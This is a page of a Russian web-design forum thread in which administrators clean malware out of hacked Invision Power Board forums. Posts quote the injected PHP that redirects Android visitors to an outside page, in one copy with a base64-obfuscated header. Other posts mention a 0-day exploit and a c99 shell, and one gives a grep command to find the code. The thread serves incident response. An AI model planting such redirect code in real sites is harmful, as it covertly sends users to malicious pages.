Security update - Страница 11 - Дизайн и модификация Invision Power Board

Перейти к содержимому

 

СвернутьПрикрепленные теги

вирус ipb обновления безопасности

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в этой теме

Security update

#151 Пользователь не на сайте   Ultima ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 70
  • Регистрация: 14-Ноябрь 11
  • Репутация: 0
  • Откуда:из проводов
  • IPB version:3.2.x
 

Отправлено 21 Январь 2013 - 11:07

Нашел ))
В файле admin/sources/base/ipsRegistry.php

нашел в самом низу и удалил код:


$mbrowser = mobile_device_detect();
$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;
if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {
setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");
header("Location: http://www.kirkdavidson.com/js/fp.html");
exit;
}
0

#152 Пользователь не на сайте   Ultima ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 70
  • Регистрация: 14-Ноябрь 11
  • Репутация: 0
  • Откуда:из проводов
  • IPB version:3.2.x
 

Отправлено 25 Январь 2013 - 16:47

Вот такие веселые коды прописались в ipsMember.php при удалении выскакивает ошибка форума ***/sources/base/ipsMember.php on line 3852, будем дальше искать

}
$mbrowser = function_exists("mobile_device_detect") ? mobile_device_detect() : false;
$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;
if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {
setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");
header(base64_decode("TG9jYXRpb246IGh0dHA6Ly93d3cua2lya2Rhdmlkc29uLmNvbS9qcy9mcC5odG1s"));
exit;
}

и в ipsRegistry.php - этот код снес

}

$mbrowser = mobile_device_detect();
$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;
if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {
setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");
header("Location: http://www.kirkdavidson.com/js/fp.html");
exit;
}


Если расшифровать вот это через base64 декодер TG9jYXRpb246IGh0dHA6Ly93d3cua2lya2Rhdmlkc29uLmNvbS9qcy9mcC5odG1s
получаем - Location: http://www.kirkdavidson.com/js/fp.html

Вот так ))
0

#153 Пользователь не на сайте   GluK ответил: »

 
 
  • Advanced
  • ***
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 186
  • Регистрация: 19-Январь 06
  • Репутация: 2
  • IPB version:3.3.x
 

Отправлено 26 Январь 2013 - 17:50

Зашел на один, а там:

Цитата

Hackers had target адресфорума.net , They were using a 0-day exploit.

They were able to exploit the file public_html/hooks/boardIndexRecentTopics_540cbccd3003d5413b759ef888b45a23.php and replace it with a c99 shell.

Please do disable that plugin on all your IP.Boards.

:: Issued in public interest by ServerPolice Inc. htttp://serverpolice.org ::


PS : We'll be back soon ;)


Версия форум у них была, мне кажется, 3.4.2
0

#154 Пользователь не на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 706
  • Регистрация: 20-Март 09
  • Репутация: 2 264
  • IPB version:3.1.x
 

Отправлено 26 Январь 2013 - 18:02

Просмотреть сообщениеGluK сказал(а):

Зашел на один, а там:
They were able to exploit the file public_html/hooks/boardIndexRecentTopics

Обновились а форум видно не до конца почистили http://ipbskins.ru/f...dpost__p__70621
0

#155 Пользователь не на сайте   Ultima ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 70
  • Регистрация: 14-Ноябрь 11
  • Репутация: 0
  • Откуда:из проводов
  • IPB version:3.2.x
 

Отправлено 28 Январь 2013 - 13:38

Друзья, подскажите как вычистить остальное )) из ipsMember.php не могу удалить выскакивает ошибка
0

#156 Пользователь не на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 706
  • Регистрация: 20-Март 09
  • Репутация: 2 264
  • IPB version:3.1.x
 

Отправлено 28 Январь 2013 - 14:25

Какая ошибка?
В остальных файлов искали?
Шеллы удалили?
ssh на хостинге есть?
1

#157 Пользователь не на сайте   Ultima ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 70
  • Регистрация: 14-Ноябрь 11
  • Репутация: 0
  • Откуда:из проводов
  • IPB version:3.2.x
 

Отправлено 28 Январь 2013 - 14:39

SSH есть. По поиску не искал, нашел только в соседнем файле sRegistry.php - и почистил вручную он там немного подругому был записал выше есть все коды которые там прописаны.
Как проверить на шеллы ? хочу поставить ХАнтера что то не ставится пока(

Код ошибки такой Parse error: syntax error, unexpected $end, expecting T_FUNCTION in ******/sources/base/ipsMember.php on line 3852
Ранее был вирус тот что из 128 картинки все что мог вроде почистил.
Патчи безопасности стоят

Сообщение изменено: Ultima (28 Январь 2013 - 14:42)

0

#158 Пользователь не на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 706
  • Регистрация: 20-Март 09
  • Репутация: 2 264
  • IPB version:3.1.x
 

Отправлено 28 Январь 2013 - 15:05

Цитата

SSH есть.

Перейдите в корень форума и выполните команду. В found.txt запишутся все найденные совпадения.
find . -name '*.php' | xargs grep -Pin "mobile_device_detect|kirkdavidson" > ./found.txt


Цитата

Код ошибки такой Parse error: syntax error, unexpected $end, expecting T_FUNCTION in ******/sources/base/ipsMember.php on line 3852

Что-то лишнее удалили. Файл прикрепите.

Цитата

Патчи безопасности стоят

Кроме патчей, нужно еще чистить изменения и левые файлы которые могли попасти на форуме до патча.
1

#159 Пользователь не на сайте   Ultima ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 70
  • Регистрация: 14-Ноябрь 11
  • Репутация: 0
  • Откуда:из проводов
  • IPB version:3.2.x
 

Отправлено 28 Январь 2013 - 15:24

Просмотреть сообщениеsiv1987 28 Январь 2013 - 15:05 сказал(а):

Перейдите в корень форума и выполните команду. В found.txt запишутся все найденные совпадения.
find . -name '*.php' | xargs grep -Pin "mobile_device_detect|kirkdavidson" > ./found.txt



Что-то лишнее удалили. Файл прикрепите.


Кроме патчи, нужно еще чистить изменения и левые файлы которые могли попасти на форуме до их установке.


А как почистить изменения и левый файлы ?
Файлы не могу залить давай на почту скину ?
Использовано 0байт из разрешенных вам 50К для загрузки файлов (максимальный размер файла: 50К)


Вот вся папка https://www.dropbox....3gh5f3/base.rar


Пишет The -P option is not supported
0

#160 Пользователь не на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 706
  • Регистрация: 20-Март 09
  • Репутация: 2 264
  • IPB version:3.1.x
 

Отправлено 28 Январь 2013 - 15:51

Цитата

А как почистить изменения и левый файлы ?

Вручную, либо из бэкапа. Но если из бэкапа, прежде чем их заливать желательно проверить.
1

#161 Пользователь не на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 706
  • Регистрация: 20-Март 09
  • Репутация: 2 264
  • IPB version:3.1.x
 

Отправлено 28 Январь 2013 - 15:59

ipsMember.php и ipsRegistry.php
1

#162 Пользователь не на сайте   Ultima ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 70
  • Регистрация: 14-Ноябрь 11
  • Репутация: 0
  • Откуда:из проводов
  • IPB version:3.2.x
 

Отправлено 28 Январь 2013 - 16:12

Просмотреть сообщениеsiv1987 28 Январь 2013 - 15:59 сказал(а):

ipsMember.php и ipsRegistry.php

Это мне ?
Народ пишет что еще ipscontroller.php нужно заменить и обновить кеш стилей чтобы не выводило ошибок

Просмотреть сообщениеsiv1987 28 Январь 2013 - 15:51 сказал(а):

Вручную, либо из бэкапа. Но если из бэкапа желательно прежде чем их заливать - проверить.

бэкапа к сожалению нет :) Если и есть то наверное старый.
0

#163 Пользователь не на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 706
  • Регистрация: 20-Март 09
  • Репутация: 2 264
  • IPB version:3.1.x
 

Отправлено 28 Январь 2013 - 16:31

Просмотреть сообщениеUltima сказал(а):

Это мне ?
Народ пишет что еще ipscontroller.php нужно заменить и обновить кеш стилей чтобы не выводило ошибок

Да. В контроллере ничего нет, и кеши стилей в вашем случае тоже не причем. Код находится в ipsRegistry и вызывается он там же и в ipsMembers.
0

#164 Пользователь не на сайте   Ultima ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 70
  • Регистрация: 14-Ноябрь 11
  • Репутация: 0
  • Откуда:из проводов
  • IPB version:3.2.x
 

Отправлено 28 Январь 2013 - 16:42

Просмотреть сообщениеsiv1987 28 Январь 2013 - 16:31 сказал(а):

Да. В контроллере ничего нет, и кеши стилей в вашем случае тоже не причем. Код находится в ipsRegistry и вызывается он там же и в ipsMembers.

Соверженно верно этот же код ?
0

#165 Пользователь не на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 706
  • Регистрация: 20-Март 09
  • Репутация: 2 264
  • IPB version:3.1.x
 

Отправлено 28 Январь 2013 - 16:46

Ultima, я вам дал очищенные файлы, можете сравнить их с теми, что у вас в архиве (вредоносный код находится в конце файлов). Дальше уже офф топ.
0

Сообщить об этой теме:


  • Вы не можете создавать новые темы
  • Вы не можете отвечать в этой теме

1 пользователей читают эту тему
0 зарегистрированных, 1 гостей, 0 скрытых


Контактная информация

Вопросы по работе сайта

+7 (917) 501-4765
C 10 до 20 в рабочие дни (время московское)

Техническая поддержка

Контактные данные специалистов

Дизайн форумов

IPB 3.x ¦ IPB 2.x

Бесплатные шаблоны

IPB 3.2 – 3.4 ¦ IPB 3.1 ¦ IPB 3.0 ¦ IPB 2.2 – 2.3 ¦ IPB 2.1 ¦ Клипарт
Лицензия на использование ¦ Ваша поддержка ¦ О проекте
Copyright © 2005-2016 IPBSkins.ru Team
При копировании материалов с сайта
прямая ссылка на источник обязательна